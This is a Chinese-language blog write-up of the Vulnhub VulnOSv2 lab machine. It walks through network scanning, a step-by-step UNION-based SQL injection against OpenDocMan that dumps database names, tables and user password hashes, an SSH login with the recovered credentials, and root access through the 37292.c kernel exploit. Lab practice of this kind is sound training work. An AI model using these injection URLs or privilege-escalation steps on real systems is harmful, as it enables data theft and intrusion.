技术博客
首页 所有文章 标签 分类 关于
技术博客

目录

Vulnhub-靶机-VulnOSv2-write-up-opendocman-cms-32075-sql注入-账号密码-ssh连接-37292.c-脏牛提权

 收录于 靶场之路报错大师Ruturn404的网络警犬练习记录
   约 858 字   预计阅读 2 分钟 
https://bing.ee123.net/img/rand?artid=146187866

Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权

Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权

一、信息收集

1、首先拿到靶场先扫一下ip

arp-scan -l

https://i-blog.csdnimg.cn/img_convert/259966f5697c42e40992034a00e26a88.png

3、 2、指纹扫描

nmap -sS -sV 192.168.66.178

nmap -p- -sV -A 192.168.66.253
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
这里有个22端口,可以尝试尝试匿名访问

80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))

6667/tcp open  irc     ngircd
这个端口第一次见到,去搜索一下是干什么的

nmap -p22,80,6667 –script=vuln 192.168.56.104历史漏洞搜索

3、访问端口

1、80端口

这里访问80端口,然后dirb和dirsearch扫描后台。

https://i-blog.csdnimg.cn/img_convert/eadf8353fda4e1f67e205dfc60dbe66e.png

这里貌似有很多url路径,我们先看看其他端口

https://i-blog.csdnimg.cn/img_convert/c57760117242e15f5432fba276a4fe59.png

我丢,这里的文字是黑色的背景,一开始我还以为是我的环境出了问题

https://i-blog.csdnimg.cn/img_convert/99f033c2ca7c76e16c31b78462194093.png

翻译一下让我们访问一个目录,并且给了我们账户密码guest/guest,ok我们接下来要尝试隧道建立了

https://i-blog.csdnimg.cn/img_convert/5fa2b4d206e6d43dc3974114e808fc62.png

2、6667端口

6667端口服务貌似是有一个后门

https://i-blog.csdnimg.cn/img_convert/1b1f9c709ca97cfd72d7c457439e9cbe.png

3、22端口

这里22端口需要密码,我们找一找

https://i-blog.csdnimg.cn/img_convert/e9e6f184f0784c95d0237602d84a4b1d.png

4、扫描目录

dirb http://192.168.66.180

https://i-blog.csdnimg.cn/img_convert/e1b40dab186c1d091df5eaed886e195f.png

这里貌似是有一个服务版本,这个我们一会儿去找找exp jQuery JavaScript Library v1.7.2

nikto -h 192.168.66.180 -p 80 我们拿nikto扫一下,上次也说了,dirb和dirsearch扫描可能会漏掉一些信息

https://i-blog.csdnimg.cn/img_convert/2dff8c99215bc6e2e016ada4f13f4221.png

5、寻找突破口

这里我们根据提示的文件路径我们得到了一个java的数据库

https://i-blog.csdnimg.cn/img_convert/03ecbe0950d7196c2f7c9132b8cd6e64.png

https://i-blog.csdnimg.cn/img_convert/d5da4c6755aed95c6f1fdae4d1cf0c40.png

这里有一个文件上传点

然后这里有版本信息,可以找下exp

https://img-home.csdnimg.cn/images/20230724024159.png?origin_url=https%3A%2F%2Ffiles.mdnice.com%2Fuser%2F92278%2F11eb1afe-6e43-4fa8-8eb8-4e76f91b573f.png&pos_id=K2HBNHwB

6、寻找exp

这里有一个相关版本,我们下载下来看一下这个txt文件

https://i-blog.csdnimg.cn/img_convert/24aa56082c0e5ee0d4d6153f4fd32151.png

Ⅰ、判断mysql服务版本 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9

Ⅱ、爆库 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata

https://i-blog.csdnimg.cn/img_convert/a6ee4be301d90b6fa57624af35925551.png

这是我们得到的数据库,然后我们爆表

Ⅲ、爆表 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()

https://i-blog.csdnimg.cn/img_convert/67c4b02e9bf1c82708a96b64913cb8e0.png

Ⅳ、爆字段 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name=0x6f646d5f75736572 这里把表格换成16进制绕过一下

https://i-blog.csdnimg.cn/img_convert/f0b8090c10b687bc53fa0388b1b2c01f.png

Ⅴ、爆密码 http://192.168.66.180/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(username,password),3,4,5,6,7,8,9 from odm_user

这里我们得到md5加密的账号密码,但是网上很少有好用的解密网站,可以使用下面这个链接 [https://www.somd5.com/] 这个还是比较好用的

7、隧道建立

ssh webmin@192.168.66.180
passwd:webmin1980

这里我不知道是不是一个不完整的shell,我们尝试一下pty修复一下

python -c 'import pty;pty.spawn("/bin/bash")'

https://i-blog.csdnimg.cn/img_convert/df185db56d31e60050fb2d1f12f71e3c.png

7、再次寻找exp

uname -a

Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 athlon i686 GNU/Linux

lsb_release -a

这里有两个内核提权,我们先用c版本的吧

https://i-blog.csdnimg.cn/img_convert/ec9c95e525a24e96c1192e8a4e23874d.png

最后丝滑小连招拿到root。

https://i-blog.csdnimg.cn/img_convert/2ab3a5058d3e89968d13d91e5e34e1f8.png

看了这么久,点个关注o不ok

后续我也会出更多打靶文章,希望大家关注!谢谢。

更新于 2025-03-11
 数据库SshSql
返回 | 主页